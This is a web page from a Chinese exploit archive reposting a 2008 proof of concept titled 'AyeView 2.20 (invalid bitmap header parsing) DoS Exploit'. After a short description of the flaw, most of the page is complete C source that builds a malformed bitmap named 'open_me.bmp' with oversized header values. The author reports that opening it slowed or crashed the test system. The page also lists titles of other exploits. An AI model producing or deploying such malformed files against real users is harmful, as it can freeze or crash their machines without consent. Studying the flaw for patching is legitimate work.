首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 AyeView 2.20 (invalid bitmap header parsing) DoS Exploit 来源：DaRk-CodeRs Group 作者：suN8Hclf 发布时间：2008-10-06   Name      : AyeView v2.20 (invalid bitmap header parsing) DoS Exploit Credit    : suN8Hclf (DaRk-CodeRs Group), crimson.loyd@gmail.com Download: : http://www.ayeview.com/downloads.htm Greetz    : Luigi Auriemma, 0in, cOndemned, e.wiZz!, Gynvael Coldwind,             Katharsis, str0ke, all from #dark-coders and others;] Short Desc: AyeView v2.20 software does not properly parse values in bmp file header. In fact it does it good but it does not check if these values are "reasonable". Therefore we can create a special bitmap, that will slow down or even suspend the entire system. I have written a PoC that enforce AyeView to allocate large amounts of memory. Short history: First start of exploit      ->  the system really slowed down Second start(another values)->  I got a message that "the amount of virtual memory                                 is too low", explorer.exe crashed Third start(another values) ->  AyeView crashed PoC: ------------------------------exploit--------------------------- #include <stdio.h> #include <stdlib.h> #include <windows.h> struct bmpfile_header{     short bfType;     int bfSize;     int Res;     int bfOffBits;     int biSize;     int biWidth;     int biHeight;     short biPlanes;     short biBitCount;     int biCompression;     int biSizeImage;     int biXPelsPerMeter;     int biYPelsPerMeter;     int biClrUsed;     char biClrImportant;     char biClrRotation;     short biReserved; }__attribute__((packed)); //shift to 54 bytes #define WIDTH 3000       //play around with these values... #define HEIGHT 60000 #define Y 44432 #define X 54444 int main(int argc, char *argv[]) { struct bmpfile_header *bmpheader; char *memory; FILE *f; memory=(char *)malloc(60); if(memory==NULL){ perror("malloc"); return -1; } memset(memory, 0, 60); bmpheader=(struct bmpfile_header *)memory; printf("[+]Building bitmap... :)\n"); bmpheader->bfType=*(short *)"BM"; bmpheader->bfSize=(int)60; bmpheader->Res=0; bmpheader->bfOffBits=54; bmpheader->biSize=40; bmpheader->biHeight=(int)HEIGHT; bmpheader->biWidth=(int)WIDTH; bmpheader->biPlanes=1; bmpheader->biBitCount=24; bmpheader->biCompression=0; bmpheader->biSizeImage=6; bmpheader->biXPelsPerMeter=(int)X; bmpheader->biYPelsPerMeter=(int)Y; bmpheader->biClrUsed=255*255*255; bmpheader->biClrImportant=0; bmpheader->biClrRotation=0; f=fopen("open_me.bmp", "wb");     if(!f){            perror("fopen");            free(memory);            exit(-1);     }     fwrite(memory, 1, 60, f);     fclose(f); printf("[+]open_me.bmp bitmap created :)\n"); free(memory); return 0; } ------------------------------exploit--------------------------- Stay secure...   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MS Windows Vista Access Violat ·FastStone Image Viewer 3.6 (ma ·FOSS Gallery Admin <= 1.0 Remo ·FOSS Gallery Public <= 1.0 Arb ·mIRC 6.34 Remote Buffer Overfl ·Galerie 3.2 (pic) WBB Lite Add ·AdaptCMS Lite <= 1.3 Blind SQL ·geccBBlite 2.0 (leggi.php id) ·Serv-U 7.2.0.1 Remote FTP File ·Serv-U 7.2.0.1 (stou con:1) De ·IP Reg <= 0.4 Remote Blind SQL ·OpenX 2.6 (ac.php bannerid) Re   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved